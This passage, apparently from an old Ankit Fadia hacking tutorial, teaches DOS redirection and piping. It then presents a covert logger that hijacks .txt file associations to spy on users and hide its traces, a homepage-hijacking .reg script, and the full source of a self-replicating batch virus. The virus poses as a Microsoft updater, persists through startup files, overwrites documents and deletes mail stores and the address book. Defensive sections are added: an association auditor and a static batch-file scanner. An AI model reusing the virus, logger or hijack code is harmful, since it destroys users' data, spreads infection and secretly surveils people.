most commonly used to capture results of a command in a text file. Say you want to read the help on how to
use the net command, typing the usual Help command is not useful as the results do not fit in one screen
and scroll by extremely quickly. So instead we use the Output Redirection operator to capture the results of
the command in a text file.
c:\windows>net > xyz.txt
This command will execute the net command and will store the results in the text file xyz.txt. Whenever
DOS comes across such a command, it checks whether the specified file exists. If it does, then everything in the
file is erased and the results are stored in it. If no such file exists, then DOS creates a new file and
stores the results in this new file.
Say you want to store the results of more than one command in the same text file, and want to ensure that
the results of no command are lost; then you make use of the Double Output Redirection Symbol, which is
the >> symbol.
For Example,
c:\windows> net >> xyz.txt
The above command tells DOS to execute the net command and append the output to the xyz.txt file, if it
exists.
DOS not only allows redirection to Files, but also allows redirection to various devices.
DEVICE NAME USED    DEVICE
AUX                 Auxiliary Device (COM1)
CLOCK$              Real Time Clock
COMn                Serial Port (COM1, COM2, COM3, COM4)
CON                 Console (Keyboard, Screen)
LPTn                Parallel Port (LPT1, LPT2, LPT3)
NUL                 NUL Device (means Nothing)
PRN                 Printer
Say for example, you want to print the results of directory listings, then you can simply give the following
command:
c:\windows>dir *.* > prn
The NUL device(nothing) is a bit difficult to understand and requires special mention. This device which is
also known as the 'bit bucket' literally means nothing. Redirection to the NUL device practically has no usage
but can be used to suppress the messages which DOS displays on the completion of a task. For example,
when DOS has successfully copied a particular file, then it displays the message: '1 file(s) copied.'
Now say you want to suppress this task completion message, then you can make use of the NUL device.
c:\windows>copy file.txt > NUL
This will suppress the task completion message and not display it.
Redirecting Input
Just like we can redirect Output, we can also redirect Input. It is handled by the Input Redirection Operator,
which is the < symbol. It is most commonly used to send the contents of a text file to DOS. The other common
usage of this feature is the MORE command, which displays a file one screen at a time, unlike the TYPE
command, which on execution displays the entire file. (This becomes impossible to read as the file scrolls by
at incredible speed.) Thus, many people send the long text file to the MORE command by using the
command:
c:\windows>more < xyz.txt
This command sends the contents of the xyz.txt file to the MORE command which displays the contents
page by page. Once the first page is read the MORE command displays something like the following on the
screen:
......MORE......
You can also send keystrokes to any DOS command which waits for User Input or needs User intervention to
perform a task. You can also send multiple keystrokes. For example, a typical Format
command requires 4 inputs: firstly pressing Enter to give the command, then the Disk Insertion prompt, then the
VOLUME label prompt and lastly the one to format another disk. So basically there are three User inputs:
ENTER, ENTER N and ENTER. (ENTER is Carriage return.) So you can include this in a Batch file and give
the format command in the following format:
c:\windows>format a: < xyz.bat
PIPING
Piping is a feature which combines both Input and Output Redirection. It uses the Pipe operator, which is the
| symbol. This command captures the Output of one command and sends it as the Input of the other
command. Say for example, when you give the command del *.* then you need to confirm that you mean to
delete all files by pressing y. Instead we can simply do the same without any User Interaction by giving the
command:
c:\windows> echo y | del *.*
This command is pretty self explanatory, y is sent to the command del *.*
Batch File Programming can be very easy and quite useful. The only thing that one needs to be able to become a Batch File Programming nerd, is adequate knowledge of DOS commands. I suggest you surf the net or get a book on DOS commands and really lick the pages off the book, only then can you become an expert.
Making your own Syslog Daemon
We can easily combine the power of batch file programs and the customizable Windows Interface to make
our own small but efficient System Logging Daemon.
Basically this Syslog Daemon can keep track of the files opened (any kind of files) and the time at which the
files were opened, and can also post the log of the User's activities on to the web, so that the System
Administrator can keep an eye on things.
Simply follow the following steps to make the daemon-:
NOTE: In the following example, I am making a syslog daemon which keeps an eye on what text files were
opened by the User. You can easily change what files you want it to keep an eye on by simply following the
same steps.
1. ASSOCIATING THE FILES TO BE MONITORED TO THE LOGGER
Actually this step is not the first, but being the easiest, I have mentioned it earlier. The first thing to do is to
associate the text files (*.txt) to our batch file which contains the code to log the User's activities. You can
of course keep an eye on other files as well; the procedure is almost the same. Anyway, we associate .txt files
to our batch program so that each time a .txt file is opened, the batch file is also executed. To do this, we
need to change the File Associations of .txt files.
For more information on Changing File Associations, refer to the Windows Help Files, simply type
Associations and search. Anyway to change the associations of .txt files and to point them to our batch
file, simply do the below:
Locate any .txt file on your system, select it(click once) and Press the SHIFT key. Keeping the SHIFT key
pressed, right click on the .txt file to bring up the OPEN WITH... option. Clicking on the OPEN WITH... option
will bring up OPEN WITH dialog box. Now click on the OTHER button and locate the batch file program
which contains the logging code and click on OPEN and OK.
Now each time a .txt file is opened, the batch file is also executed, hence logging all interactions of the User
with .txt files.
2. Creating the Log File
Now you need to create a text file which will act as a log file and will log the activities of the User.
This log file will contain the filename and the time at which the .txt file was opened. Create a new blank text
file in the same directory as the batch file. Now make this log file hidden by changing its attributes with
the ATTRIB command.
C:\windows>attrib xyz.txt +h
This will ensure that a lamer will not know as to where the log file is located.
3. CODING THE LOGGING BATCH FILE
The coding of the actual batch file which will log the User's activities and post it on the web is quite simple. If
you have read this tutorial properly till now, then you would easily be able to understand it, although I still
have inserted comments for novices.
REM Send the file name of the file opened to the log file, xyz.txt
echo %1 >> xyz.txt
REM Launch Notepad so that the lamer does not know something is wrong.
notepad %1
This logging file will only log the filename of the text file which was opened by the unsuspecting lamer. Say
you want to also log the time at which a particular file was opened; then you simply make use of the 'time'
command. The only thing that one needs to keep in mind is that after giving the TIME command, we need
to press Enter too, which in turn has to be entered in the batch file too.
Say you, the system administrator, do not have physical access or have gone on a business trip,
but have access to the net and need to keep in touch with the server log file; then you can easily link the log file
to an HTML file and view it at the click of a button. You could also make this part of the site password
protected or, even better, form a public security watch contest where the person who spots something fishy
wins a prize or something. Anyway, the linking can easily be done by creating an .htm or .html file and
inserting the following snippet of code:
<html>
<head><title>Server Logs</title></head>
<body>
<a href="xyz.txt">Click here to read the Server Logs</a>
</body>
</html>
That was an example of the easiest HTML page one could create.
Another enhancement that one could make is to prevent the opening of a particular file. Say if you want to prevent the user from launching abc.txt then you would need to insert an IF conditional statement.
IF "%1" == "filename.extension" ECHO Error Message Here
4. Enhancing the logging Batch file to escape the eyes of the Lamer.
To enhance the functioning of our logging daemon, we need to first know its normal functioning.
Normally, if you have followed the above steps properly, then each time a .txt file is opened, the batch file
is launched(in a new window, which is maximized) and which in turn launches Notepad. Once the filename
and time have been logged, the batch file Window does not close automatically and the User has to exit
from the Window manually. So maybe someone even remotely intelligent will suspect something fishy. We
can configure our batch file to work minimized and to close itself after the logging process has been
completed. To do this simply follow the following steps-:
a) Right Click on the Batch File.
b) Click on properties from the Pop up menu.
c) In the Program tab click on the Close on Exit option.
d) Under the same tab, under the RUN Input box select Minimized.
e) Click on Apply and voila the batch file is now more intelligent
This was just an example of a simple batch file program. You can easily create a more intelligent and more useful program using batch code.
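Seen from the administrator's side, the association change made in step 1 is easy to audit: a document type that opens through a script instead of a viewer stands out. The following is an added example, not part of the original tutorial; it assumes the file-type listing comes from the `ftype` command of an NT-family cmd.exe, and the function names, the extension list and the sample listing (including the path C:\tools\logger.bat) are constructed for illustration.

```python
import ntpath
import re

# Extensions that mean "a script runs first" rather than a viewer or editor.
SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js", ".wsf"}

def handler_of(command):
    """Return the program part of an open-command string."""
    m = re.match(r'\s*"([^"]*)"', command)               # "C:\dir\app.exe" "%1"
    if m:
        return m.group(1)
    m = re.match(r"\s*(.+?\.\w{2,4})(?=\s|$)", command)  # C:\dir\app.exe %1
    if m:
        return m.group(1)
    parts = command.split()
    return parts[0] if parts else ""

def audit(ftype_output):
    """Return (file type, handler) pairs for types opened through a script."""
    hits = []
    for line in ftype_output.splitlines():
        if "=" not in line:
            continue
        filetype, command = line.split("=", 1)
        handler = handler_of(command)
        # batfile/cmdfile legitimately use "%1" itself as the handler
        if handler.startswith("%1"):
            continue
        if ntpath.splitext(handler)[1].lower() in SCRIPT_EXTS:
            hits.append((filetype.strip(), handler))
    return hits

# Constructed listing in the "filetype=command" form that ftype prints.
SAMPLE = r'''txtfile=C:\tools\logger.bat %1
inifile=%SystemRoot%\system32\NOTEPAD.EXE %1
batfile="%1" %*
regfile=regedit.exe "%1"
Word.Document.8="C:\Program Files\Office\WINWORD.EXE" /n "%1"
'''

if __name__ == "__main__":
    for filetype, handler in audit(SAMPLE):
        print(f"{filetype} is opened through a script: {handler}")
```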
MAKING YOUR OWN DEADLY BATCH FILE VIRUS: The atimaN_8 Batch File Virus
DISCLAIMER: This Virus was created by Ankit Fadia ankit@bol.net.in and is meant for educational purposes only. This Virus was coded to make people understand the basic concept of the Working of a Virus. Execute this Batch File at your own Risk. Any Damage caused by this file is not Ankit Fadia's fault. If you want any information regarding this Virus, do please feel free to contact me at: ankit@bol.net.in also visit my site at: http://www.crosswinds.net/~hackingtruths
The following is a simple but somewhat deadly (but quite lame) Batch File Virus that I created. I have named it atimaN_8. I have used no advanced Batch or DOS commands in this virus and am sure that almost all of you will have no problem understanding the code. If you still have trouble understanding the code, do mail me at ankit@bol.net.in
@ECHO OFF
CLS
IF EXIST c:\winupdt.bat GOTO CODE
GOTO SETUP
:SETUP
@ECHO OFF
ECHO Welcome To Microsoft Windows System Updater Setup
ECHO.
copy %0 c:\winupdt.bat >> NUL
ECHO Scanning System.....Please Wait
prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
ECHO DONE.
ECHO.
ECHO Installing Components....Please Wait
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
ECHO DONE.
ECHO.
ECHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates.
PAUSE
ECHO Downloading Components...Please Wait
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx"
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
ECHO Setup Will Now restart Your Computer....Please Wait
ECHO Your System is not faster by almost 40%.
ECHO Thank you for using a Microsoft Partner's product.
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
c:\WINDOWS\RUNDLL user.exe,exitwindowsexec
CLS
GOTO END
:CODE
CLS
@ECHO OFF
prompt $P$SWindows2000
IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC
type %0 >> c:\autoexec.bat
:ABC
type %0 >> c:\windows\dosstart.bat
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
GOTO :END
CLS
:END
CLS
This was an example of a pretty lame batch file virus. We can similarly create a virus which will edit the registry and create havoc. This is just a thought, I am not responsible for what you do with this.
There is simply no direct way of editing the Windows Registry through a batch file. Although there are Windows Registry command line options (check them out in the Advanced Windows Hacking Chapter), they are not as useful as adding keys or editing keys can be. The best option we have is to create a .reg file and then execute it through a batch file. The most important thing to remember here is the format of a .reg file and the fact that the first line of all .reg files should contain nothing but the string REGEDIT4, else Windows will not be able to recognize it as a registry file. The following is a simple example of a batch file which changes the home page of the User (if Internet Explorer is installed) to http://hackingtruths.tripod.com
@ECHO OFF
ECHO REGEDIT4 >ankit.reg
ECHO [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> ankit.reg
ECHO "Start Page"="http://hackingtruths.tripod.com" >> ankit.reg
START ankit.reg
Creating a .reg file is not as easy as it seems. You see, for Windows to recognize a file as a Registry file and to add the contents of the .reg file to the registry, it has to be in a particular recognizable format, else an error message would be displayed. I would not want to repeat the entire Windows Registry File format here, as the Advanced Windows Hacking Manual has a huge section specially dedicated to the Windows Registry.
Protection from Batch File Viruses
If you double-click a batch file (.bat file) it will run automatically. This can be dangerous as batch files can sometimes contain harmful commands. Worse still, if you use the single-click option, one wrong click and it's goodbye Windows. Now most power users would like to set Edit as the default action. The best way to do that is to go to Explorer's Folder Options' File View tab to change the default action. However, to add insult to injury, when you arrive there, you will find that the Edit and Set Default buttons have been grayed out. This is a "feature" from Microsoft you might not appreciate.
To conquer our problem here, fire up your registry editor and go to HKEY_CLASSES_ROOT\batfile\shell\open. Rename the open key to run, so that it becomes HKEY_CLASSES_ROOT\batfile\shell\run. Double-click the EditFlags binary value in HKEY_CLASSES_ROOT\batfile and enter 00 00 00 00 as the new value. Now, open Explorer, click Folder Options from the View menu and select the File Types tab, scroll down to the "MS-DOS Batch File" item, highlight it and click Edit. You'll notice that the last three buttons (Edit, Remove and Set Default) are now enabled and that you can select Edit as the default action.
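Opening a batch file in an editor only helps if you know what to look for. As an added example (not part of the original tutorial), the following static check reads a batch file without running it and flags the behaviours the listing above relies on: copying itself through %0, writing to files that run at startup, overwriting documents in a FOR loop, mass deletion, and generating or launching a .reg file. The rule names, function names and the sample script are constructed for illustration.

```python
import re

# Each rule mirrors one behaviour of the listing above; DOS is case-insensitive.
RULES = [
    # the script uses its own path (%0) as the source of a copy or type
    ("self-copy", r'\b(copy|type)\s+%0\b'),
    # a redirect or copy whose destination runs at boot or logon
    ("startup-persistence",
     r'(>>?|\bcopy\b.*)\s*"?[^"\n]*(autoexec\.bat|dosstart\.bat|\\startup\\)'),
    # FOR loop that copies one fixed file over every matched file
    ("bulk-overwrite", r'\bfor\s+%%(\w)\s+in\s*\(.*\)\s*do\s+copy\s+\S+\s+%%\1'),
    # delete with a wildcard, or delete of a FOR loop variable
    ("mass-delete", r'\bdel\s+("[^"]*\*[^"]*"|\S*\*\S*|%%\w)'),
    # building a .reg file with ECHO, or launching one
    ("reg-import", r'\becho\s+REGEDIT4\b|\b(start|regedit)\b.*\.reg\b'),
    # restart forced through RUNDLL
    ("forced-restart", r'\brundll(32)?(\.exe)?\s+user\.exe,\s*exitwindows'),
]
COMPILED = [(name, re.compile(rx, re.I)) for name, rx in RULES]

def scan(script_text):
    """Return (line number, rule name) for every rule hit; REM lines and labels are skipped."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith(":") or stripped.upper().startswith("REM "):
            continue
        for name, pattern in COMPILED:
            if pattern.search(stripped):
                findings.append((lineno, name))
    return findings

def looks_self_replicating(findings):
    """True when the script both copies itself and writes to a startup location."""
    rules = {name for _, name in findings}
    return {"self-copy", "startup-persistence"} <= rules

# Constructed sample input; file names are placeholders.
SAMPLE = r"""@ECHO OFF
REM constructed sample; file names are placeholders
IF "%0" == "C:\AUTOEXEC.BAT" GOTO DONE
type %0 >> c:\autoexec.bat
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\sample.bat" >> NUL
FOR %%a IN (C:\docs\*.txt) DO COPY c:\sample.bat %%a >> NUL
FOR %%a IN (*.zip) DO del %%a
ECHO REGEDIT4 >sample.reg
START sample.reg
:DONE
"""
```

Calling scan(SAMPLE) reports the rule hits by line number, and looks_self_replicating() on that result separates a script that merely deletes or copies files from one that also installs itself.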
Ankit Fadia
ankit@bol.net.in
Get the Archive of Manuals [EVERYTHING YOU DREAMT OFF] written by Ankit Fadia
At his mailing list.
To get the manuals in your Inbox join his mailing list by sending an email to:
programmingforhackers-subscribe@egroups.com